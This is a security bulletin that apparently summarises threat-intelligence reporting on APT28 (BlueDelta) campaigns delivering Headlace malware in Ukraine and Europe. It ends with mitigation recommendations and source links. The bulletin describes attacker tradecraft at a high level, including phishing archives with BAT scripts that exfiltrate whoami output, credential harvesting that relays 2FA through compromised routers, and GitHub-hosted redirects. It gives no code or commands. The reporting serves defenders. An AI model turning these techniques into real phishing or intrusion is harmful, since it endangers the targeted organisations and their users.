Summary:
On September 4, 2023, CERT-UA reported a phishing campaign that leveraged Headlace malware to target a critical energy infrastructure facility in Ukraine. During this campaign, BlueDelta sent phishing emails from a fake sender address that contained links to archive files. The archive files contained lure images and Windows BAT script, which, if executed, would result in the whoami command being run and the results being exfiltrated back to the threat actor. Russia is applying all of its resources to gain a strategic advantage over Ukraine. Over the past year, Insikt Group has tracked the evolution of BlueDelta’s (APT28) operational infrastructure, which was used to deploy its information-stealing malware Headlace in three distinct phases between April and December 2023. The activity resembles previously activity attributed to APT28 or Fancy Bear which is known to be working as a part of GRU. Throughout the attack, BlueDelta used phishing emails, legitimate internet services (LIS), and living off-the-land binaries (LOLBins) to extract intelligence from key networks across Europe. They have engaged in credential harvesting campaigns aimed at Yahoo and UKR[.]net users, as well as dedicated victim mail servers. BlueDelta’s tactics, which primarily involve credential capture for initial access, are engineered to mimic regular network traffic, making detection difficult. Some of BlueDelta’s credential harvesting pages can bypass two-factor authentication by relaying requests between legitimate services and compromised Ubiquiti routers, increasing their effectiveness. The abuse of LIS, such as GitHub, to host redirection scripts also complicates the identification of malicious activity. Critical sectors targeted by BlueDelta, including government, military, defense, energy, transportation, and think tanks, must bolster their awareness and defenses against these tactics. Security training should prioritize identifying characteristics of BlueDelta’s phishing emails, which are highlighted in Insikt Group reporting.

Security Officer Comments:
BlueDelta's espionage activities reflect a broader strategy aimed at gathering intelligence on entities with military significance to Russia in the context of its ongoing aggression against Ukraine. This focus is consistent with their objective to uncover operational capabilities and potential vulnerabilities within Ukraine's defense sector. Throughout these campaigns, BlueDelta has continuously refined its operations, demonstrating notable sophistication and adaptability. Russia’s strategic interests include targeting Ukrainian military organizations and gathering information to support its war in Ukraine and monitor the geopolitical landscape of NATO and Russia’s neighboring countries. Notably, in September 2023, Zscaler published a report that provided additional information regarding BlueDelta’s new attack chains which targeted organizations in Australia, Belgium, and Poland. In December 2023, Proofpoint and IBM published research on a new wave of BlueDelta spearphishing using various lure content to deliver Headlace malware.

Suggested Corrections:
Recorded Future has published relevant IOCs and MITRE ATT&CK techniques in their report.

Recorded Future makes the following mitigation recommendations:

• Establish real-time alerts to detect typosquat domains that mimic your brand. This proactive measure helps guard against entities like BlueDelta, which could exploit these domains for credential harvesting and phishing
• Implement multi-factor authentication (MFA) to add an extra layer of security and make it more challenging for attackers to abuse compromised credentials
• Monitor open source reporting for the latest threat actor tradecraft, TTPs, targeting, and indicators of compromise (IoCs) to ensure you are informed of the threat
• Provide comprehensive training to employees on email security best practices, including identifying phishing emails, suspicious attachments, and links. Regularly reinforce training to maintain a high level of awareness and vigilance
• Implement a domain name system (DNS)-blocking policy to prevent connections to free hosting apex domains, such as those used by InfinityFree and free API services, if your company does not use them
• Be cautious of suspicious-looking email attachments and report them to the organization’s internal IT team
• We recommend restricting access to non-essential free services often exploited by BlueDelta and highlighted in this report

Link(s):
https://securityaffairs.com/164061/apt/apt28-headlace-malware-europe.html

https://www.recordedfuture.com/grus...rks-in-europe-with-multi-phase-espionage-camp

PDF Full Report: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf